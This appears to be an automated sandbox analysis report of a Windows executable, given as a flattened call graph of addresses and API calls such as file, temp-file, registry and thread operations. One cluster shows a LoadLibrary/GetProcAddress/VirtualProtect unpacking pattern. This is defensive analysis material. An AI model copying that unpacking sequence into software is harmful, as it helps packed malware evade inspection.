95359->95361 95413 907c0e 47 API calls __getptd_noexit 95360->95413 95364 904e1c __lock_file 48 API calls 95361->95364 95370 903614 __fcloseall 95361->95370 95363 903609 95414 906e10 8 API calls __ftell_nolock 95363->95414 95366 90362e 95364->95366 95397 903578 95366->95397 95370->95326 95372 92bcb6 95371->95372 95373 92bc76 95371->95373 95372->95373 95380 92bd3d 95372->95380 95373->95349 95373->95373 95376 92bda8 95375->95376 95377 92bd97 95375->95377 95376->95346 95378 902aae 80 API calls 95377->95378 95378->95376 95379->95349 95381 92bd7a 95380->95381 95382 92bd69 95380->95382 95381->95372 95384 902aae 95382->95384 95385 902aba __fcloseall 95384->95385 95386 902ad4 95385->95386 95387 902aec 95385->95387 95388 902ae4 __fcloseall 95385->95388 95390 907c0e __ftell_nolock 47 API calls 95386->95390 95389 904e1c __lock_file 48 API calls 95387->95389 95388->95381 95391 902af2 95389->95391 95392 902ad9 95390->95392 95393 902957 78 API calls 95391->95393 95394 906e10 __ftell_nolock 8 API calls 95392->95394 95395 902b06 95393->95395 95394->95388 95396 902b24 RtlLeaveCriticalSection RtlLeaveCriticalSection 95395->95396 95396->95388 95398 903587 95397->95398 95399 90359b 95397->95399 95449 907c0e 47 API calls __getptd_noexit 95398->95449 95401 903597 95399->95401 95416 902c84 95399->95416 95415 903653 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 95401->95415 95402 90358c 95450 906e10 8 API calls __ftell_nolock 95402->95450 95408 902933 __ftell_nolock 47 API calls 95409 9035b5 95408->95409 95426 90e9d2 95409->95426 95411 9035bb 95411->95401 95412 901c9d _free 47 API calls 95411->95412 95412->95401 95413->95363 95414->95370 95415->95370 95417 902cbb 95416->95417 95418 902c97 95416->95418 95422 90eb36 95417->95422 95418->95417 95419 902933 __ftell_nolock 47 API calls 95418->95419 95420 902cb4 95419->95420 95451 90af61 95420->95451 95423 9035af 95422->95423 95424 90eb43 95422->95424 95423->95408 95424->95423 95425 901c9d _free 47 API calls 95424->95425 95425->95423 95427 90e9de __fcloseall 95426->95427 95428 90e9e6 95427->95428 95429 90e9fe 95427->95429 95500 907bda 47 API calls __getptd_noexit 95428->95500 95431 90ea7b 95429->95431 95436 90ea28 95429->95436 95504 907bda 47 API calls __getptd_noexit 95431->95504 95432 90e9eb 95501 907c0e 47 API calls __getptd_noexit 95432->95501 95435 90ea80 95505 907c0e 47 API calls __getptd_noexit 95435->95505 95476 90a8ed 95436->95476 95437 90e9f3 __fcloseall 95437->95411 95440 90ea88 95506 906e10 8 API calls __ftell_nolock 95440->95506 95441 90ea2e 95443 90ea41 95441->95443 95444 90ea4c 95441->95444 95485 90ea9c 95443->95485 95502 907c0e 47 API calls __getptd_noexit 95444->95502 95447 90ea47 95503 90ea73 RtlLeaveCriticalSection __unlock_fhandle 95447->95503 95449->95402 95450->95401 95452 90af6d __fcloseall 95451->95452 95453 90af75 95452->95453 95454 90af8d 95452->95454 95456 907bda __chsize_nolock 47 API calls 95453->95456 95455 90b022 95454->95455 95460 90afbf 95454->95460 95457 907bda __chsize_nolock 47 API calls 95455->95457 95458 90af7a 95456->95458 95459 90b027 95457->95459 95461 907c0e __ftell_nolock 47 API calls 95458->95461 95462 907c0e __ftell_nolock 47 API calls 95459->95462 95463 90a8ed ___lock_fhandle 49 API calls 95460->95463 95470 90af82 __fcloseall 95461->95470 95464 90b02f 95462->95464 95465 90afc5 95463->95465 95466 906e10 __ftell_nolock 8 API calls 95464->95466 95467 90afd8 95465->95467 95468 90afeb 95465->95468 95466->95470 95469 90b043 __chsize_nolock 75 API calls 95467->95469 95471 907c0e __ftell_nolock 47 API calls 95468->95471 95472 90afe4 95469->95472 95470->95417 95473 90aff0 95471->95473 95475 90b01a __flswbuf RtlLeaveCriticalSection 95472->95475 95474 907bda __chsize_nolock 47 API calls 95473->95474 95474->95472 95475->95470 95477 90a8f9 __fcloseall 95476->95477 95478 90a946 RtlEnterCriticalSection 95477->95478 95480 907cf4 __lock 47 API calls 95477->95480 95479 90a96c __fcloseall 95478->95479 95479->95441 95481 90a91d 95480->95481 95482 90a928 InitializeCriticalSectionAndSpinCount 95481->95482 95483 90a93a 95481->95483 95482->95483 95484 90a970 ___lock_fhandle RtlLeaveCriticalSection 95483->95484 95484->95478 95486 90aba4 __chsize_nolock 47 API calls 95485->95486 95488 90eaaa 95486->95488 95487 90eb00 95489 90ab1e __free_osfhnd 48 API calls 95487->95489 95488->95487 95490 90aba4 __chsize_nolock 47 API calls 95488->95490 95499 90eade 95488->95499 95492 90eb08 95489->95492 95493 90ead5 95490->95493 95491 90aba4 __chsize_nolock 47 API calls 95494 90eaea CloseHandle 95491->95494 95495 907bed __dosmaperr 47 API calls 95492->95495 95498 90eb2a 95492->95498 95496 90aba4 __chsize_nolock 47 API calls 95493->95496 95494->95487 95497 90eaf6 GetLastError 95494->95497 95495->95498 95496->95499 95497->95487 95498->95447 95499->95487 95499->95491 95500->95432 95501->95437 95502->95447 95503->95437 95504->95435 95505->95440 95506->95437 95507->94859 95508->94869 95509->94869 95510->94863 95511->94882 95512->94884 95513->94881 95515 90f8a0 __ftell_nolock 95514->95515 95516 8e40b4 GetLongPathNameW 95515->95516 95517 8e6a63 48 API calls 95516->95517 95518 8e40dc 95517->95518 95519 8e49a0 95518->95519 95520 8ed7f7 48 API calls 95519->95520 95521 8e49b2 95520->95521 95522 8e660f 49 API calls 95521->95522 95523 8e49bd 95522->95523 95524 952e35 95523->95524 95525 8e49c8 95523->95525 95530 952e4f 95524->95530 95572 8fd35e 60 API calls 95524->95572 95526 8e64cf 48 API calls 95525->95526 95528 8e49d4 95526->95528 95566 8e28a6 95528->95566 95531 8e49e7 Mailbox 95531->94732 95533 8e41a9 136 API calls 95532->95533 95534 8e415e 95533->95534 95535 953489 95534->95535 95536 8e41a9 136 API calls 95534->95536 95537 92c396 122 API calls 95535->95537 95538 8e4172 95536->95538 95539 95349e 95537->95539 95538->95535 95540 8e417a 95538->95540 95541 9534a2 95539->95541 95542 9534bf 95539->95542 95544 8e4186 95540->95544 95545 9534aa 95540->95545 95546 8e4252 84 API calls 95541->95546 95543 8ff4ea 48 API calls 95542->95543 95563 953504 Mailbox 95543->95563 95573 8ec833 95544->95573 95675 926b49 87 API calls _wprintf 95545->95675 95546->95545 95550 9534b8 95550->95542 95551 9536b4 95552 901c9d _free 47 API calls 95551->95552 95553 9536bc 95552->95553 95554 8e4252 84 API calls 95553->95554 95559 9536c5 95554->95559 95558 901c9d _free 47 API calls 95558->95559 95559->95558 95560 8e4252 84 API calls 95559->95560 95679 9225b5 86 API calls 4 library calls 95559->95679 95560->95559 95562 8ece19 48 API calls 95562->95563 95563->95551 95563->95559 95563->95562 95661 8eba85 95563->95661 95669 8e4dd9 95563->95669 95676 922551 48 API calls ___crtGetEnvironmentStringsW 95563->95676 95677 922472 60 API calls 2 library calls 95563->95677 95678 929c12 48 API calls 95563->95678 95567 8e28b8 95566->95567 95571 8e28d7 ___crtGetEnvironmentStringsW 95566->95571 95569 8ff4ea 48 API calls 95567->95569 95568 8ff4ea 48 API calls 95570 8e28ee 95568->95570 95569->95571 95570->95531 95571->95568 95572->95524 95574 8ec843 __ftell_nolock 95573->95574 95575 953095 95574->95575 95576 8ec860 95574->95576 95704 9225b5 86 API calls 4 library calls 95575->95704 95685 8e48ba 49 API calls 95576->95685 95579 8ec882 95686 8e4550 56 API calls 95579->95686 95580 9530a8 95705 9225b5 86 API calls 4 library calls 95580->95705 95582 8ec897 95582->95580 95584 8ec89f 95582->95584 95586 8ed7f7 48 API calls 95584->95586 95585 9530c4 95588 8ec90c 95585->95588 95587 8ec8ab 95586->95587 95687 8fe968 49 API calls __ftell_nolock 95587->95687 95590 9530d7 95588->95590 95591 8ec91a 95588->95591 95594 8e4907 CloseHandle 95590->95594 95690 901dfc 95591->95690 95592 8ec8b7 95595 8ed7f7 48 API calls 95592->95595 95596 9530e3 95594->95596 95597 8ec8c3 95595->95597 95598 8e41a9 136 API calls 95596->95598 95599 8e660f 49 API calls 95597->95599 95600 95310d 95598->95600 95601 8ec8d1 95599->95601 95603 953136 95600->95603 95608 92c396 122 API calls 95600->95608 95688 8feb66 SetFilePointerEx ReadFile 95601->95688 95602 8ec943 _wcscat _wcscpy 95607 8ec96d SetCurrentDirectoryW 95602->95607 95706 9225b5 86 API calls 4 library calls 95603->95706 95605 8ec8fd 95689 8e46ce SetFilePointerEx SetFilePointerEx 95605->95689 95611 8ff4ea 48 API calls 95607->95611 95612 953129 95608->95612 95610 95314d 95620 8ecad1 Mailbox 95610->95620 95613 8ec988 95611->95613 95614 953131 95612->95614 95615 953152 95612->95615 95617 8e47b7 48 API calls 95613->95617 95618 8e4252 84 API calls 95614->95618 95616 8e4252 84 API calls 95615->95616 95619 953157 95616->95619 95633 8ec993 Mailbox __NMSG_WRITE 95617->95633 95618->95603 95621 8ff4ea 48 API calls 95619->95621 95680 8e48dd 95620->95680 95628 953194 95621->95628 95622 8eca9d 95700 8e4907 95622->95700 95626 8e3d98 95626->94609 95626->94632 95627 8ecaa9 SetCurrentDirectoryW 95627->95620 95630 8eba85 48 API calls 95628->95630 95656 9531dd Mailbox 95630->95656 95632 9533ce 95711 929b72 48 API calls 95632->95711 95633->95622 95641 95345f 95633->95641 95644 8ece19 48 API calls 95633->95644 95647 953467 95633->95647 95693 8eb337 56 API calls _wcscpy 95633->95693 95694 8fc258 GetStringTypeW 95633->95694 95695 8ecb93 59 API calls __wcsnicmp 95633->95695 95696 8ecb5a GetStringTypeW __NMSG_WRITE 95633->95696 95697 9016d0 GetStringTypeW __wtof_l 95633->95697 95698 8ecc24 162 API calls 3 library calls 95633->95698 95699 8fc682 48 API calls 95633->95699 95637 953480 95637->95622 95638 9533f0 95712 9429e8 48 API calls ___crtGetEnvironmentStringsW 95638->95712 95640 9533fd 95642 901c9d _free 47 API calls 95640->95642 95714 92240b 48 API calls 3 library calls 95641->95714 95642->95620 95644->95633 95646 8eba85 48 API calls 95646->95656 95715 9225b5 86 API calls 4 library calls 95647->95715 95652 8ece19 48 API calls 95652->95656 95655 953420 95713 9225b5 86 API calls 4 library calls 95655->95713 95656->95632 95656->95646 95656->95652 95656->95655 95707 922551 48 API calls ___crtGetEnvironmentStringsW 95656->95707 95708 922472 60 API calls 2 library calls 95656->95708 95709 929c12 48 API calls 95656->95709 95710 8fc682 48 API calls 95656->95710 95658 953439 95659 901c9d _free 47 API calls 95658->95659 95660 95344c 95659->95660 95660->95620 95662 8ebb25 95661->95662 95666 8eba98 ___crtGetEnvironmentStringsW 95661->95666 95664 8ff4ea 48 API calls 95662->95664 95663 8ff4ea 48 API calls 95665 8eba9f 95663->95665 95664->95666 95667 8ff4ea 48 API calls 95665->95667 95668 8ebac8 95665->95668 95666->95663 95667->95668 95668->95563 95670 8e4dec 95669->95670 95673 8e4e9a 95669->95673 95671 8ff4ea 48 API calls 95670->95671 95674 8e4e1e 95670->95674 95671->95674 95672 8ff4ea 48 API calls 95672->95674 95673->95563 95674->95672 95674->95673 95675->95550 95676->95563 95677->95563 95678->95563 95679->95559 95681 8e4907 CloseHandle 95680->95681 95682 8e48e5 Mailbox 95681->95682 95683 8e4907 CloseHandle 95682->95683 95684 8e48fc 95683->95684 95684->95626 95685->95579 95686->95582 95687->95592 95688->95605 95689->95588 95716 901e46 95690->95716 95693->95633 95694->95633 95695->95633 95696->95633 95697->95633 95698->95633 95699->95633 95701 8e4920 95700->95701 95702 8e4911 95700->95702 95701->95702 95703 8e4925 CloseHandle 95701->95703 95702->95627 95703->95702 95704->95580 95705->95585 95706->95610 95707->95656 95708->95656 95709->95656 95710->95656 95711->95638 95712->95640 95713->95658 95714->95647 95715->95637 95717 901e61 95716->95717 95720 901e55 95716->95720 95740 907c0e 47 API calls __getptd_noexit 95717->95740 95719 902019 95724 901e41 95719->95724 95741 906e10 8 API calls __ftell_nolock 95719->95741 95720->95717 95729 901ed4 95720->95729 95735 909d6b 47 API calls __ftell_nolock 95720->95735 95723 901fa0 95723->95717 95723->95724 95726 901fb0 95723->95726 95724->95602 95725 901f5f 95725->95717 95727 901f7b 95725->95727 95737 909d6b 47 API calls __ftell_nolock 95725->95737 95739 909d6b 47 API calls __ftell_nolock 95726->95739 95727->95717 95727->95724 95731 901f91 95727->95731 95729->95717 95734 901f41 95729->95734 95736 909d6b 47 API calls __ftell_nolock 95729->95736 95738 909d6b 47 API calls __ftell_nolock 95731->95738 95734->95723 95734->95725 95735->95729 95736->95734 95737->95727 95738->95724 95739->95724 95740->95719 95741->95724 95743 8e4c8b 95742->95743 95748 8e4d94 95742->95748 95744 8ff4ea 48 API calls 95743->95744 95743->95748 95745 8e4cb2 95744->95745 95746 8ff4ea 48 API calls 95745->95746 95752 8e4d22 95746->95752 95748->94739 95750 8e4dd9 48 API calls 95750->95752 95751 8eba85 48 API calls 95751->95752 95752->95748 95752->95750 95752->95751 95755 8eb470 95752->95755 95783 929af1 48 API calls 95752->95783 95753->94741 95754->94743 95756 8e6b0f 48 API calls 95755->95756 95774 8eb495 95756->95774 95757 8eb69b 95758 8eba85 48 API calls 95757->95758 95759 8eb6b5 Mailbox 95758->95759 95759->95752 95762 95397b 95789 9226bc 88 API calls 4 library calls 95762->95789 95765 8eb9e4 95790 9226bc 88 API calls 4 library calls 95765->95790 95766 953973 95766->95759 95768 8eba85 48 API calls 95768->95774 95770 8ebcce 48 API calls 95770->95774 95771 953989 95772 8eba85 48 API calls 95771->95772 95772->95766 95773 953909 95776 8e6b4a 48 API calls 95773->95776 95774->95757 95774->95762 95774->95765 95774->95768 95774->95770 95774->95773 95775 8ebb85 48 API calls 95774->95775 95779 8ebdfa 48 API calls 95774->95779 95782 953939 ___crtGetEnvironmentStringsW 95774->95782 95784 8ec413 59 API calls 95774->95784 95785 8ebc74 48 API calls 95774->95785 95786 8ec6a5 49 API calls 95774->95786 95787 8ec799 48 API calls ___crtGetEnvironmentStringsW 95774->95787 95775->95774 95778 953914 95776->95778 95781 8ff4ea 48 API calls 95778->95781 95780 8eb66c CharUpperBuffW 95779->95780 95780->95774 95781->95782 95788 9226bc 88 API calls 4 library calls 95782->95788 95783->95752 95784->95774 95785->95774 95786->95774 95787->95774 95788->95766 95789->95771 95790->95766 95792 8e403c LoadImageW 95791->95792 95793 95418d EnumResourceNamesW 95791->95793 95794 8e3ee1 RegisterClassExW 95792->95794 95793->95794 95795 8e3f53 GetSysColorBrush RegisterClassExW RegisterClipboardFormatW 95794->95795 95796 8e3fe4 LoadIconW 95795->95796 95798 8e3e05 95796->95798 95798->94759 95800 8ef130 95799->95800 95803 8efe30 335 API calls 95800->95803 95807 8ef199 95800->95807 95801 8ef3dd 95804 9587c8 95801->95804 95813 8ef3f2 95801->95813 95851 8ef431 Mailbox 95801->95851 95802 8ef595 95810 8ed7f7 48 API calls 95802->95810 95802->95851 95805 958728 95803->95805 95901 92cc5c 86 API calls 4 library calls 95804->95901 95805->95807 95898 92cc5c 86 API calls 4 library calls 95805->95898 95807->95801 95807->95802 95811 8ed7f7 48 API calls 95807->95811 95847 8ef229 95807->95847 95808 8efe30 335 API calls 95808->95851 95812 9587a3 95810->95812 95815 958772 95811->95815 95900 900f0a 52 API calls __cinit 95812->95900 95842 8ef418 95813->95842 95902 929af1 48 API calls 95813->95902 95814 958b1b 95833 958b2c 95814->95833 95834 958bcf 95814->95834 95899 900f0a 52 API calls __cinit 95815->95899 95818 8ef770 95822 958a45 95818->95822 95841 8ef77a 95818->95841 95820 8ed6e9 55 API calls 95820->95851 95821 958b7e 95911 93e40a 335 API calls Mailbox 95821->95911 95908 8fc1af 48 API calls 95822->95908 95823 958c53 95916 92cc5c 86 API calls 4 library calls 95823->95916 95824 958810 95903 93eef8 335 API calls 95824->95903 95825 8efe30 335 API calls 95843 8ef6aa 95825->95843 95826 92cc5c 86 API calls 95826->95851 95827 958beb 95914 93bdbd 335 API calls Mailbox 95827->95914 95910 93f5ee 335 API calls 95833->95910 95913 92cc5c 86 API calls 4 library calls 95834->95913 95835 8f1b90 48 API calls 95835->95851 95838 8f1b90 48 API calls 95838->95851 95840 958c00 95863 8ef537 Mailbox 95840->95863 95915 92cc5c 86 API calls 4 library calls 95840->95915 95841->95838 95842->95814 95842->95843 95842->95851 95843->95818 95843->95825 95844 8efce0 95843->95844 95843->95851 95843->95863 95844->95863 95912 92cc5c 86 API calls 4 library calls 95844->95912 95846 958823 95846->95842 95850 95884b 95846->95850 95847->95801 95847->95802 95847->95842 95847->95851 95904 93ccdc 48 API calls 95850->95904 95851->95808 95851->95820 95851->95821 95851->95823 95851->95826 95851->95827 95851->95835 95851->95844 95851->95863 95897 8edd47 48 API calls ___crtGetEnvironmentStringsW 95851->95897 95909 9197ed InterlockedDecrement 95851->95909 95917 8fc1af 48 API calls 95851->95917 95853 958857 95855 9588aa 95853->95855 95856 958865 95853->95856 95860 9588a0 Mailbox 95855->95860 95906 92a69d 48 API calls 95855->95906 95905 929b72 48 API calls 95856->95905 95857 8efe30 335 API calls 95857->95863 95860->95857 95861 9588e7 95907 8ebc74 48 API calls 95861->95907 95863->94818 95865 8f479f 95864->95865 95866 8f4637 95864->95866 95869 8ece19 48 API calls 95865->95869 95867 956e05 95866->95867 95868 8f4643 95866->95868 95986 93e822 335 API calls Mailbox 95867->95986 95918 8f4300 95868->95918 95872 8f46e4 Mailbox 95869->95872 95879 8e4252 84 API calls 95872->95879 95933 926524 95872->95933 95936 92fa0c 95872->95936 95977 936ff0 95872->95977 95873 8f4739 Mailbox 95873->94818 95874 956e11 95874->95873 95987 92cc5c 86 API calls 4 library calls 95874->95987 95876 8f4659 95876->95872 95876->95873 95876->95874 95879->95873 95881->94818 95882->94818 95883->94818 95884->94818 95885->94818 95886->94774 95887->94766 95888->94771 95889->94818 95890->94818 95891->94812 95892->94812 95893->94812 95894->94812 95895->94812 95896->94812 95897->95851 95898->95807 95899->95847 95900->95851 95901->95863 95902->95824 95903->95846 95904->95853 95905->95860 95906->95861 95907->95860 95908->95851 95909->95851 95910->95851 95911->95844 95912->95863 95913->95863 95914->95840 95915->95863 95916->95863 95917->95851 95919 956e60 95918->95919 95922 8f432c 95918->95922 95989 92cc5c 86 API calls 4 library calls 95919->95989 95921 956e71 95990 92cc5c 86 API calls 4 library calls 95921->95990 95922->95921 95930 8f4366 ___crtGetEnvironmentStringsW 95922->95930 95924 8f4435 95929 8f4445 95924->95929 95988 93cda2 82 API calls Mailbox 95924->95988 95925 8ff4ea 48 API calls 95925->95930 95927 8f44b1 95927->95876 95928 8efe30 335 API calls 95928->95930 95929->95876 95930->95924 95930->95925 95930->95928 95930->95929 95931 956ebd 95930->95931 95991 92cc5c 86 API calls 4 library calls 95931->95991 95992 926ca9 GetFileAttributesW 95933->95992 95937 92fa1c __ftell_nolock 95936->95937 95938 92fa44 95937->95938 96057 8ed286 48 API calls 95937->96057 95940 8e936c 81 API calls 95938->95940 95941 92fa5e 95940->95941 95942 92fa80 95941->95942 95943 92fb68 95941->95943 95952 92fb92 95941->95952 95944 8e936c 81 API calls 95942->95944 95945 8e41a9 136 API calls 95943->95945 95950 92fa8c _wcscpy _wcschr 95944->95950 95946 92fb79 95945->95946 95947 92fb8e 95946->95947 95948 8e41a9 136 API calls 95946->95948 95949 8e936c 81 API calls 95947->95949 95947->95952 95948->95947 95951 92fbc7 95949->95951 95954 92fab0 _wcscat _wcscpy 95950->95954 95955 92fade _wcscat 95950->95955 95953 901dfc __wsplitpath 47 API calls 95951->95953 95952->95873 95961 92fbeb _wcscat _wcscpy 95953->95961 95959 8e936c 81 API calls 95954->95959 95956 8e936c 81 API calls 95955->95956 95957 92fafc _wcscpy 95956->95957 96058 9272cb GetFileAttributesW 95957->96058 95959->95955 95960 92fb1c __NMSG_WRITE 95960->95952 95962 8e936c 81 API calls 95960->95962 95964 8e936c 81 API calls 95961->95964 95963 92fb48 95962->95963 96059 9260dd 77 API calls 4 library calls 95963->96059 95966 92fc82 95964->95966 95996 92690b 95966->95996 95967 92fb5c 95967->95952 95969 92fca2 95970 926524 3 API calls 95969->95970 95971 92fcb1 95970->95971 95972 8e936c 81 API calls 95971->95972 95974 92fce2 95971->95974 95973 92fccb 95972->95973 96002 92bfa4 95973->96002 95976 8e4252 84 API calls 95974->95976 95976->95952 95978 8e936c 81 API calls 95977->95978 95979 93702a 95978->95979 95980 8eb470 91 API calls 95979->95980 95981 93703a 95980->95981 95982 93705f 95981->95982 95983 8efe30 335 API calls 95981->95983 95985 937063 95982->95985 96064 8ecdb9 48 API calls 95982->96064 95983->95982 95985->95873 95986->95874 95987->95873 95988->95927 95989->95921 95990->95929 95991->95929 95993 926529 95992->95993 95994 926cc4 FindFirstFileW 95992->95994 95993->95873 95994->95993 95995 926cd9 FindClose 95994->95995 95995->95993 95997 926918 _wcschr __ftell_nolock 95996->95997 95998 901dfc __wsplitpath 47 API calls 95997->95998 96000 92692e _wcscat _wcscpy 95997->96000 95999 92695d 95998->95999 96001 901dfc __wsplitpath 47 API calls 95999->96001 96000->95969 96001->96000 96003 92bfb1 __ftell_nolock 96002->96003 96004 8ff4ea 48 API calls 96003->96004 96005 92c00e 96004->96005 96006 8e47b7 48 API calls 96005->96006 96007 92c018 96006->96007 96008 92bdb4 GetSystemTimeAsFileTime 96007->96008 96009 92c023 96008->96009 96010 8e4517 83 API calls 96009->96010 96011 92c036 _wcscmp 96010->96011 96012 92c107 96011->96012 96013 92c05a 96011->96013 96014 92c56d 94 API calls 96012->96014 96015 92c56d 94 API calls 96013->96015 96030 92c0d3 _wcscat 96014->96030 96016 92c05f 96015->96016 96017 901dfc __wsplitpath 47 API calls 96016->96017 96019 92c110 96016->96019 96023 92c088 _wcscat _wcscpy 96017->96023 96018 8e44ed 64 API calls 96020 92c12c 96018->96020 96019->95974 96021 8e44ed 64 API calls 96020->96021 96022 92c13c 96021->96022 96024 8e44ed 64 API calls 96022->96024 96025 901dfc __wsplitpath 47 API calls 96023->96025 96026 92c157 96024->96026 96025->96030 96027 8e44ed 64 API calls 96026->96027 96028 92c167 96027->96028 96029 8e44ed 64 API calls 96028->96029 96031 92c182 96029->96031 96030->96018 96030->96019 96032 8e44ed 64 API calls 96031->96032 96033 92c192 96032->96033 96034 8e44ed 64 API calls 96033->96034 96035 92c1a2 96034->96035 96036 8e44ed 64 API calls 96035->96036 96037 92c1b2 96036->96037 96060 92c71a GetTempPathW GetTempFileNameW 96037->96060 96039 92c1be 96040 903499 117 API calls 96039->96040 96052 92c1cf 96040->96052 96041 9035e4 __fcloseall 83 API calls 96042 92c294 96041->96042 96044 92c29a DeleteFileW 96042->96044 96045 92c2ae 96042->96045 96043 8e44ed 64 API calls 96043->96052 96044->96019 96046 92c342 CopyFileW 96045->96046 96047 92c2b8 96045->96047 96048 92c36a DeleteFileW 96046->96048 96049 92c358 DeleteFileW 96046->96049 96053 92b965 118 API calls 96047->96053 96061 92c6d9 CreateFileW 96048->96061 96049->96019 96051 902aae 80 API calls 96051->96052 96052->96019 96052->96043 96052->96051 96055 92c289 96052->96055 96054 92c32d 96053->96054 96054->96048 96056 92c331 DeleteFileW 96054->96056 96055->96041 96056->96019 96057->95938 96058->95960 96059->95967 96060->96039 96062 92c715 96061->96062 96063 92c6ff SetFileTime CloseHandle 96061->96063 96062->96019 96063->96062 96064->95985 96065 9519cb 96070 8e2322 96065->96070 96067 9519d1 96103 900f0a 52 API calls __cinit 96067->96103 96069 9519db 96071 8e2344 96070->96071 96104 8e26df 96071->96104 96076 8ed7f7 48 API calls 96077 8e2384 96076->96077 96078 8ed7f7 48 API calls 96077->96078 96079 8e238e 96078->96079 96080 8ed7f7 48 API calls 96079->96080 96081 8e2398 96080->96081 96082 8ed7f7 48 API calls 96081->96082 96083 8e23de 96082->96083 96084 8ed7f7 48 API calls 96083->96084 96085 8e24c1 96084->96085 96112 8e263f 96085->96112 96089 8e24f1 96090 8ed7f7 48 API calls 96089->96090 96091 8e24fb 96090->96091 96141 8e2745 96091->96141 96093 8e2546 96094 8e2556 GetStdHandle 96093->96094 96095 95501d 96094->96095 96096 8e25b1 96094->96096 96095->96096 96098 955026 96095->96098 96097 8e25b7 CoInitialize 96096->96097 96097->96067 96148 9292d4 53 API calls 96098->96148 96100 95502d 96149 9299f9 CreateThread 96100->96149 96102 955039 CloseHandle 96102->96097 96103->96069 96150 8e2854 96104->96150 96107 8e6a63 48 API calls 96108 8e234a 96107->96108 96109 8e272e 96108->96109 96164 8e27ec 6 API calls 96109->96164 96111 8e237a 96111->96076 96113 8ed7f7 48 API calls 96112->96113 96114 8e264f 96113->96114 96115 8ed7f7 48 API calls 96114->96115 96116 8e2657 96115->96116 96165 8e26a7 96116->96165 96119 8e26a7 48 API calls 96120 8e2667 96119->96120 96121 8ed7f7 48 API calls 96120->96121 96122 8e2672 96121->96122 96123 8ff4ea 48 API calls 96122->96123 96124 8e24cb 96123->96124 96125 8e22a4 96124->96125 96126 8e22b2 96125->96126 96127 8ed7f7 48 API calls 96126->96127 96128 8e22bd 96127->96128 96129 8ed7f7 48 API calls 96128->96129 96130 8e22c8 96129->96130 96131 8ed7f7 48 API calls 96130->96131 96132 8e22d3 96131->96132 96133 8ed7f7 48 API calls 96132->96133 96134 8e22de 96133->96134 96135 8e26a7 48 API calls 96134->96135 96136 8e22e9 96135->96136 96137 8ff4ea 48 API calls 96136->96137 96138 8e22f0 96137->96138 96139 951fe7 96138->96139 96140 8e22f9 RegisterClipboardFormatW 96138->96140 96140->96089 96142 955f4d 96141->96142 96143 8e2755 96141->96143 96170 92c942 50 API calls 96142->96170 96145 8ff4ea 48 API calls 96143->96145 96147 8e275d 96145->96147 96146 955f58 96147->96093 96148->96100 96149->96102 96171 9299df 54 API calls 96149->96171 96157 8e2870 96150->96157 96153 8e2870 48 API calls 96154 8e2864 96153->96154 96155 8ed7f7 48 API calls 96154->96155 96156 8e2716 96155->96156 96156->96107 96158 8ed7f7 48 API calls 96157->96158 96159 8e287b 96158->96159 96160 8ed7f7 48 API calls 96159->96160 96161 8e2883 96160->96161 96162 8ed7f7 48 API calls 96161->96162 96163 8e285c 96162->96163 96163->96153 96164->96111 96166 8ed7f7 48 API calls 96165->96166 96167 8e26b0 96166->96167 96168 8ed7f7 48 API calls 96167->96168 96169 8e265f 96168->96169 96169->96119 96170->96146 96172 9e5f50 96173 9e5f60 96172->96173 96174 9e607a LoadLibraryA 96173->96174 96178 9e60bf VirtualProtect VirtualProtect 96173->96178 96175 9e6091 96174->96175 96175->96173 96177 9e60a3 GetProcAddress 96175->96177 96177->96175 96180 9e60b9 ExitProcess 96177->96180 96179 9e6124 96178->96179 96179->96179 96181 95197b 96186 8fdd94 96181->96186 96185 95198a 96187 8ff4ea 48 API calls 96186->96187 96188 8fdd9c 96187->96188 96189 8fddb0 96188->96189 96194 8fdf3d 96188->96194 96193 900f0a 52 API calls __cinit 96189->96193 96193->96185 96195 8fdda8 96194->96195 96196 8fdf46 96194->96196 96198 8fddc0 96195->96198 96226 900f0a 52 API calls __cinit 96196->96226 96199 8ed7f7 48 API calls 96198->96199 96200 8fddd7 GetVersionExW 96199->96200 96201 8e6a63 48 API calls 96200->96201 96202 8fde1a 96201->96202 96227 8fdfb4 96202->96227 96205 8e6571 48 API calls 96208 8fde2e 96205->96208 96207 9524c8 96208->96207 96231 8fdf77 96208->96231 96210 8fdea4 GetCurrentProcess 96240 8fdf5f LoadLibraryA GetProcAddress 96210->96240 96211 8fdee3 96234 8fe00c 96211->96234 96212 8fdf31 GetSystemInfo 96214 8fdf0e 96212->96214 96217 8fdf1c FreeLibrary 96214->96217 96218 8fdf21 96214->96218 96217->96218 96218->96189 96219 8fdebb 96219->96211 96219->96212 96220 8fdf29 GetSystemInfo 96222 8fdf03 96220->96222 96221 8fdef9 96237 8fdff4 96221->96237 96222->96214 96225 8fdf09 FreeLibrary 96222->96225 96225->96214 96226->96195 96228 8fdfbd 96227->96228 96229 8eb18b 48 API calls 96228->96229 96230 8fde22 96229->96230 96230->96205 96241 8fdf89 96231->96241 96245 8fe01e 96234->96245 96238 8fe00c 2 API calls 96237->96238 96239 8fdf01 GetNativeSystemInfo 96238->96239 96239->96222 96240->96219 96242 8fdea0 96241->96242 96243 8fdf92 LoadLibraryA 96241->96243 96242->96210 96242->96219 96243->96242 96244 8fdfa3 GetProcAddress 96243->96244 96244->96242 96246 8fdef1 96245->96246 96247 8fe027 LoadLibraryA 96245->96247 96246->96220 96246->96221 96247->96246 96248 8fe038 GetProcAddress 96247->96248 96248->96246 96249 9519ba 96254 8fc75a 96249->96254 96253 9519c9 96255 8ed7f7 48 API calls 96254->96255 96256 8fc7c8 96255->96256 96262 8fd26c 96256->96262 96258 8fc865 96260 8fc881 96258->96260 96265 8fd1fa 48 API calls ___crtGetEnvironmentStringsW 96258->96265 96261 900f0a 52 API calls __cinit 96260->96261 96261->96253 96266 8fd298 96262->96266 96265->96258 96267 8fd28b 96266->96267 96268 8fd2a5 96266->96268 96267->96258 96268->96267 96269 8fd2ac RegOpenKeyExW 96268->96269 96269->96267 96270 8fd2c6 RegQueryValueExW 96269->96270 96271 8fd2fc RegCloseKey 96270->96271 96272 8fd2e7 96270->96272 96271->96267 96272->96271

                          Executed Functions

                          Function 0090B043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
